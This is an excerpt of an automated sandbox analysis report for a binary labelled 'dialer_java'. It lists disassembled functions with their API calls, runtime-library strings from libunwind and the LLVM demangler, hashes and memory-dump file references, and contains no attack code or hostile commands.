Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fflush$CaptureContextgetenv
String ID: .anonymous.$libunwind: unwind_phase2_forced(ex_ojb=%p): __unw_get_proc_info failed => _URC_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): calling personality function %p$libunwind: unwind_phase2_forced(ex_ojb=%p): calling stop function with _UA_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned %d, _URC_FATAL_PHASE2_ERROR$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_CONTINUE_UNWIND$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_INSTALL_CONTEXT$libunwind: unwind_phase2_forced(ex_ojb=%p): start_ip=0x%llx, func=%s, lsda=0x%llx, personality=0x%llx$libunwind: unwind_phase2_forced(ex_ojb=%p): stop function returned %d$libunwind: unwind_phase2_forced(ex_ojb=%p): stopped by stop function
API String ID: 3501801798-3031193476
Opcode ID: 2c2042e08bbac2c23237b96d70b7f4566f0efbb0a5ba3dd869ebdfe9a7cb8860
Instruction ID: 8bdc840a91e95953a651523aa4a4d52319dcf566f447acc89078596bf2431f8d
Opcode Fuzzy Hash: 2c2042e08bbac2c23237b96d70b7f4566f0efbb0a5ba3dd869ebdfe9a7cb8860
Instruction Fuzzy Hash: 81815C10A0D61641FE34AB62E4163BA52D5EF85FC9F4022B9DE4E977C2DF2CAD0D824D

Function 00007FF695DC3820 Relevance: 31.8, APIs: 7, Strings: 11, Instructions: 297
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fflush.MSVCRT ref: 00007FF695DC387D
memcpy.MSVCRT ref: 00007FF695DC39F9
fflush.MSVCRT ref: 00007FF695DC3B05
fflush.MSVCRT ref: 00007FF695DC3B5D
RtlUnwindEx.KERNEL32 ref: 00007FF695DC3CEA
fflush.MSVCRT ref: 00007FF695DC3D4A
abort.MSVCRT ref: 00007FF695DC3D4F

Part of subcall function 00007FF695DC8A70: getenv.MSVCRT ref: 00007FF695DC8A93

Strings

libunwind: _GCC_specific_handler() calling personality function %p(1, %d, %llx, %p, %p), xrefs: 00007FF695DC3AE5
RtlUnwindEx() failed, xrefs: 00007FF695DC3D0C
libunwind: _GCC_specific_handler(%#010lx(%lx), %p), xrefs: 00007FF695DC3863
Personality continued unwind at the target frame!, xrefs: 00007FF695DC3BA9
CCG!, xrefs: 00007FF695DC3891
_GCC_specific_handler, xrefs: 00007FF695DC3BA2, 00007FF695DC3C03, 00007FF695DC3D05, 00007FF695DC3D2A
Personality indicated exception handler in phase 2!, xrefs: 00007FF695DC3D31
CCG , xrefs: 00007FF695DC3884
Personality installed context during phase 1!, xrefs: 00007FF695DC3C0A
libunwind: %s - %s, xrefs: 00007FF695DC3B9B, 00007FF695DC3BFC, 00007FF695DC3CFE, 00007FF695DC3D23
libunwind: _GCC_specific_handler() personality returned %d, xrefs: 00007FF695DC3B40

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fflush$Unwindabortgetenvmemcpy
String ID: CCG $CCG!$Personality continued unwind at the target frame!$Personality indicated exception handler in phase 2!$Personality installed context during phase 1!$RtlUnwindEx() failed$_GCC_specific_handler$libunwind: %s - %s$libunwind: _GCC_specific_handler(%#010lx(%lx), %p)$libunwind: _GCC_specific_handler() calling personality function %p(1, %d, %llx, %p, %p)$libunwind: _GCC_specific_handler() personality returned %d
API String ID: 4246679292-2140983942
Opcode ID: 399306ebe4ceb0f237bae98179e1acdd12333d68336ae5344bae23e9d3188841
Instruction ID: 68e53a383974acf5c3f5cbe640fe6e8a0a8951762c455db1723c422a25f246c5
Opcode Fuzzy Hash: 399306ebe4ceb0f237bae98179e1acdd12333d68336ae5344bae23e9d3188841
Instruction Fuzzy Hash: 76D18221A09AC281EA359B15E4027F9B3E4FF84B54F006276DE8D83791DF3DE999C748

Function 00007FF695DD2BCA Relevance: 31.6, APIs: 21, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

isxdigit.MSVCRT ref: 00007FF695DD2BE5
isxdigit.MSVCRT ref: 00007FF695DD2BF7
isxdigit.MSVCRT ref: 00007FF695DD2C09
isxdigit.MSVCRT ref: 00007FF695DD2C1B
isxdigit.MSVCRT ref: 00007FF695DD2C2D
isxdigit.MSVCRT ref: 00007FF695DD2C3F
isxdigit.MSVCRT ref: 00007FF695DD2C51
isxdigit.MSVCRT ref: 00007FF695DD2C63
isxdigit.MSVCRT ref: 00007FF695DD2C75
isxdigit.MSVCRT ref: 00007FF695DD2C87
isxdigit.MSVCRT ref: 00007FF695DD2C99
isxdigit.MSVCRT ref: 00007FF695DD2CAB
isxdigit.MSVCRT ref: 00007FF695DD2CBD
isxdigit.MSVCRT ref: 00007FF695DD2CCF
isxdigit.MSVCRT ref: 00007FF695DD2CE1
isxdigit.MSVCRT ref: 00007FF695DD2CF3
isxdigit.MSVCRT ref: 00007FF695DD2D05
isxdigit.MSVCRT ref: 00007FF695DD2D17
isxdigit.MSVCRT ref: 00007FF695DD2D29
isxdigit.MSVCRT ref: 00007FF695DD2D3B
malloc.MSVCRT ref: 00007FF695DD2D88

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: isxdigit$malloc
String ID:
API String ID: 1399014089-0
Opcode ID: 493b3504e96b5132e726ee44de8f28cecf9b5d1527bf54c4c4c996011feb9626
Instruction ID: 0dfe927243a214176d20580cf85fe6d2b16e406aed60ded4e0540536a1d04747
Opcode Fuzzy Hash: 493b3504e96b5132e726ee44de8f28cecf9b5d1527bf54c4c4c996011feb9626
Instruction Fuzzy Hash: 6A519621608A8242F7744B31989063E67E0EF81F45F0816B6CE5EC6DA1DF2CEDA8D708

Function 00007FF695DD7B80 Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 336
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF695DD7C1B
_assert.MSVCRT ref: 00007FF695DD80BC

Part of subcall function 00007FF695DC3F50: fflush.MSVCRT ref: 00007FF695DC3F8F
Part of subcall function 00007FF695DC3F50: RtlUnwindEx.KERNEL32 ref: 00007FF695DC40A6
Part of subcall function 00007FF695DC3F50: fflush.MSVCRT ref: 00007FF695DC4106
Part of subcall function 00007FF695DC3F50: abort.MSVCRT ref: 00007FF695DC410B

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DD80AF
Parser->TemplateParams.size() >= OldNumTemplateParamLists, xrefs: 00007FF695DD80A8
yptn, xrefs: 00007FF695DD7B80

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fflush$Unwind_assertabortmalloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Parser->TemplateParams.size() >= OldNumTemplateParamLists$yptn
API String ID: 2460331008-2552725819
Opcode ID: 0c80bad6e972a27b6348764f3f0f3f2045ecc6d1aad5778c6820c893f99cd668
Instruction ID: a1beefc7c3624a6def82a1244ce9a0d42ab0eede5243b8196f2d6a043ab34782
Opcode Fuzzy Hash: 0c80bad6e972a27b6348764f3f0f3f2045ecc6d1aad5778c6820c893f99cd668
Instruction Fuzzy Hash: 18E1B132619B8285EA75CB11E4443BA77E8FB44F80F455276DA8D87B91DF3CE98AC304

Function 00007FF695DD2DF3 Relevance: 25.6, APIs: 17, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

isxdigit.MSVCRT ref: 00007FF695DD2E0E
isxdigit.MSVCRT ref: 00007FF695DD2E20
isxdigit.MSVCRT ref: 00007FF695DD2E32
isxdigit.MSVCRT ref: 00007FF695DD2E44
isxdigit.MSVCRT ref: 00007FF695DD2E56
isxdigit.MSVCRT ref: 00007FF695DD2E68
isxdigit.MSVCRT ref: 00007FF695DD2E7A
isxdigit.MSVCRT ref: 00007FF695DD2E8C
isxdigit.MSVCRT ref: 00007FF695DD2E9E
isxdigit.MSVCRT ref: 00007FF695DD2EB0
isxdigit.MSVCRT ref: 00007FF695DD2EC2
isxdigit.MSVCRT ref: 00007FF695DD2ED4
isxdigit.MSVCRT ref: 00007FF695DD2EE6
isxdigit.MSVCRT ref: 00007FF695DD2EF8
isxdigit.MSVCRT ref: 00007FF695DD2F0A
isxdigit.MSVCRT ref: 00007FF695DD2F1C
malloc.MSVCRT ref: 00007FF695DD2F69

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: isxdigit$malloc
String ID:
API String ID: 1399014089-0
Opcode ID: 7f82570470b9a3b9cecc052cb3018d2ab878e44e7211999c67834c7bc2493845
Instruction ID: ed1b596369864139b6395d367c960c586c15cc898d842b3b8cb536a60fef96e5
Opcode Fuzzy Hash: 7f82570470b9a3b9cecc052cb3018d2ab878e44e7211999c67834c7bc2493845
Instruction Fuzzy Hash: 5D519721608B8242E7794B31989033EA7E0EF41F45F0816B6CE5EC6D91DF2CEDA8D748

Function 00007FF695DD82A0 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 243
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF695DD82E7
realloc.MSVCRT ref: 00007FF695DD8385
malloc.MSVCRT ref: 00007FF695DD839B
memcpy.MSVCRT ref: 00007FF695DD83B6
_assert.MSVCRT ref: 00007FF695DD8410
realloc.MSVCRT ref: 00007FF695DD8476
realloc.MSVCRT ref: 00007FF695DD84C5
realloc.MSVCRT ref: 00007FF695DD851B
realloc.MSVCRT ref: 00007FF695DD85BE
memcpy.MSVCRT ref: 00007FF695DD85E0

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DD8403
Last != First && "Calling back() on empty vector!", xrefs: 00007FF695DD83FC
yptn, xrefs: 00007FF695DD82A0

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$mallocmemcpy$_assert
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Calling back() on empty vector!"$yptn
API String ID: 3355138791-4068048850
Opcode ID: 4d44fd90ec9d97f9a4df74b2dd578239c104db6aa568a6ee0de0dbe9cbb52ee8
Instruction ID: e750ce2c01d25cc19d462207dd7c91c06323ea5dfc59b6c5439efcbbc7a4b598
Opcode Fuzzy Hash: 4d44fd90ec9d97f9a4df74b2dd578239c104db6aa568a6ee0de0dbe9cbb52ee8
Instruction Fuzzy Hash: 9891C272A05B8682EA36CB15E454679B3E5EB54BC0F449272DF4D87790EF3CEA49C304

Function 00007FF695DDF790 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 311
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

realloc.MSVCRT ref: 00007FF695DDF849
realloc.MSVCRT ref: 00007FF695DDF8E7
realloc.MSVCRT ref: 00007FF695DDF934
realloc.MSVCRT ref: 00007FF695DDF989
realloc.MSVCRT ref: 00007FF695DDF9E7
memcpy.MSVCRT ref: 00007FF695DDFA00
realloc.MSVCRT ref: 00007FF695DDFA36
realloc.MSVCRT ref: 00007FF695DDFB2C

Strings

objc_obj, xrefs: 00007FF695DDFA8B
c_object, xrefs: 00007FF695DDF7CB
objc_obj, xrefs: 00007FF695DDF7BE
c_object, xrefs: 00007FF695DDFA98

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID: c_object$c_object$objc_obj$objc_obj
API String ID: 1833655766-1179801904
Opcode ID: 68cd87f9df8f5cfa69a5d2627882f52522deb85eface613025237f93cf7fe6bf
Instruction ID: 308925a8060b104dac8a1e3a0556b911ccc63a4274b71ec04b8b84ceee1308a6
Opcode Fuzzy Hash: 68cd87f9df8f5cfa69a5d2627882f52522deb85eface613025237f93cf7fe6bf
Instruction Fuzzy Hash: 9DC15DA6A05B8682EE34CF16E444279A7A1EB95FC0F149672CB8D87790DF3CE949C304

Function 00007FF695DE7F20 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF695DE7F82
memset.MSVCRT ref: 00007FF695DE8015
wcscpy.MSVCRT ref: 00007FF695DE806D
wcscat.MSVCRT ref: 00007FF695DE8078
wcslen.MSVCRT ref: 00007FF695DE8089
memset.MSVCRT ref: 00007FF695DE81A4
wcscpy.MSVCRT ref: 00007FF695DE8203
wcscat.MSVCRT ref: 00007FF695DE820E
wcslen.MSVCRT ref: 00007FF695DE8222

Strings

@, xrefs: 00007FF695DE8266
, xrefs: 00007FF695DE82AB
@, xrefs: 00007FF695DE80C1
0, xrefs: 00007FF695DE825B
0, xrefs: 00007FF695DE80B6

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: memset$wcscatwcscpywcslen
String ID: $0$0$@$@
API String ID: 4263182637-1413854666
Opcode ID: cdbdf97fc269be1a0d164d62ed342f19875fa9a7fd4d8a48898fd4e855d17c00
Instruction ID: 72bc090ac1eb5e7ed17edaa24811ff47334028136afb66259b51abc3c670c7e3
Opcode Fuzzy Hash: cdbdf97fc269be1a0d164d62ed342f19875fa9a7fd4d8a48898fd4e855d17c00
Instruction Fuzzy Hash: F5B18F2191C6C285E7318B24F9053BAB7E0FF84B44F402275EA8D966A5DF7ED94E8B04

Function 00007FF695DDCA90 Relevance: 19.7, APIs: 10, Strings: 1, Instructions: 417COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DDCC08
memcpy.MSVCRT ref: 00007FF695DDCC27
malloc.MSVCRT ref: 00007FF695DDCC5B
malloc.MSVCRT ref: 00007FF695DDCE46
memcpy.MSVCRT ref: 00007FF695DDCE65

Strings

noexcept, xrefs: 00007FF695DDCCB3

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc$memcpy
String ID: noexcept
API String ID: 3800483350-1409219070
Opcode ID: 23c07888132c1ba9a5abca388b04d8f54e5c1515e0ee32ea7d1c2d187f81c89b
Instruction ID: 89ce8ebbeda5ea5bb33b5c06c40e97ef940e291ac7c4c20ce5b276e2019c6a1f
Opcode Fuzzy Hash: 23c07888132c1ba9a5abca388b04d8f54e5c1515e0ee32ea7d1c2d187f81c89b
Instruction Fuzzy Hash: 9D02D37260AB8585EE708B15E44437977E4EB44F80F445276DB8E87BA1DF3CE899C708

Function 00007FF695DE7260 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 318COMMON

Download Yara Rule

APIs

wcsncmp.MSVCRT ref: 00007FF695DE7365
memset.MSVCRT ref: 00007FF695DE742D
wcscpy.MSVCRT ref: 00007FF695DE7494
wcscat.MSVCRT ref: 00007FF695DE749F
wcslen.MSVCRT ref: 00007FF695DE74A7
wcslen.MSVCRT ref: 00007FF695DE74C2
wcslen.MSVCRT ref: 00007FF695DE7540
wcslen.MSVCRT ref: 00007FF695DE7592

Strings

X, xrefs: 00007FF695DE7711
`, xrefs: 00007FF695DE7729
0, xrefs: 00007FF695DE736A

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: wcslen$memsetwcscatwcscpywcsncmp
String ID: 0$X$`
API String ID: 329590056-2527496196
Opcode ID: 45aed35eb9f863044d84302e0661416d15cae368e09a4d5212cccfba54d1e7ac
Instruction ID: 163f0bfcb96e79a8c545ec6d784bf94764193493770348701d2b5d0f3d66aaf9
Opcode Fuzzy Hash: 45aed35eb9f863044d84302e0661416d15cae368e09a4d5212cccfba54d1e7ac
Instruction Fuzzy Hash: 2E029822A18BC281E7708B18E9003BAB7A0FB85B54F005379DA9D877A5DF7DE94DC704

Function 00007FF695DDE230 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 266COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDE275
realloc.MSVCRT ref: 00007FF695DDE2DB
realloc.MSVCRT ref: 00007FF695DDE337
realloc.MSVCRT ref: 00007FF695DDE39F
realloc.MSVCRT ref: 00007FF695DDE3FA
realloc.MSVCRT ref: 00007FF695DDE45A
realloc.MSVCRT ref: 00007FF695DDE4C5
realloc.MSVCRT ref: 00007FF695DDE513
realloc.MSVCRT ref: 00007FF695DDE56F

Strings

restric, xrefs: 00007FF695DDE46F
volatil, xrefs: 00007FF695DDE40F

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: restric$ volatil
API String ID: 471065373-3617781792
Opcode ID: 04e3ec345cb3c778bbf34f95bdb079c4d89fbdfe26ba5954cde4d1f3c9909d39
Instruction ID: e93eb9d652fcb392e2369077654147b9b48b976afce3d3e5cd745305bccca73b
Opcode Fuzzy Hash: 04e3ec345cb3c778bbf34f95bdb079c4d89fbdfe26ba5954cde4d1f3c9909d39
Instruction Fuzzy Hash: 2DB151B2A06F8682DA298F46F55427DB3A1EB54FC0F409572CB9E477A0EF3CE9558304

Function 00007FF695DD9ED0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 256COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DD9EFC
realloc.MSVCRT ref: 00007FF695DD9FEC
realloc.MSVCRT ref: 00007FF695DDA06C
realloc.MSVCRT ref: 00007FF695DDA0E6
realloc.MSVCRT ref: 00007FF695DDA146
realloc.MSVCRT ref: 00007FF695DDA191
realloc.MSVCRT ref: 00007FF695DDA1D2
memcpy.MSVCRT ref: 00007FF695DDA1EC
realloc.MSVCRT ref: 00007FF695DDA224

Strings

set , xrefs: 00007FF695DDA08F
at offs, xrefs: 00007FF695DDA081

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$mallocmemcpy
String ID: at offs$set
API String ID: 1059646398-2369781007
Opcode ID: ce501ce98fd795f4a36eda83ed67996a915afdf4059a98f1c7426f5b765f9e9f
Instruction ID: 82efa1bac441fc517232ba7a55444e27c011f4bfa65e7995a0e5d7a7fee58f81
Opcode Fuzzy Hash: ce501ce98fd795f4a36eda83ed67996a915afdf4059a98f1c7426f5b765f9e9f
Instruction Fuzzy Hash: EDA1B4B2A05B8682EF398F16E4403A9A3A5EB54FC4F44D272CB8D47794EF3CD9858304

Function 00007FF695DC6830 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF695DC6952
memset.MSVCRT ref: 00007FF695DC69E3
fputwc.MSVCRT ref: 00007FF695DC6A5E
fputwc.MSVCRT ref: 00007FF695DC6ABE
fputwc.MSVCRT ref: 00007FF695DC6B1E

Strings

o, xrefs: 00007FF695DC6844
o, xrefs: 00007FF695DC699E
o, xrefs: 00007FF695DC69F5
o, xrefs: 00007FF695DC6963
o, xrefs: 00007FF695DC6892
o, xrefs: 00007FF695DC6B3D

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fputwc$memset
String ID: o$o$o$o$o$o
API String ID: 822753988-2858737866
Opcode ID: ec0378b7f33f77d8e7c97258e2461193ec11778b80df3b520114259e277ecf23
Instruction ID: 468d2f606a88c96bd4663bdb809637e884c687c3f4c8e1df1300f6bef01fed1c
Opcode Fuzzy Hash: ec0378b7f33f77d8e7c97258e2461193ec11778b80df3b520114259e277ecf23
Instruction Fuzzy Hash: 3E91E322E1424286EB758E2AF14073966D1EF24B94F10A370DB6ADA7D1DF3CEC99C704

Function 00007FF695DDC560 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDC5D6
realloc.MSVCRT ref: 00007FF695DDC67B
realloc.MSVCRT ref: 00007FF695DDC6D7
realloc.MSVCRT ref: 00007FF695DDC744
realloc.MSVCRT ref: 00007FF695DDC79F
realloc.MSVCRT ref: 00007FF695DDC7FF
realloc.MSVCRT ref: 00007FF695DDC86A
realloc.MSVCRT ref: 00007FF695DDC8B8

Strings

volatil, xrefs: 00007FF695DDC7B4
restric, xrefs: 00007FF695DDC814

Memory Dump Source

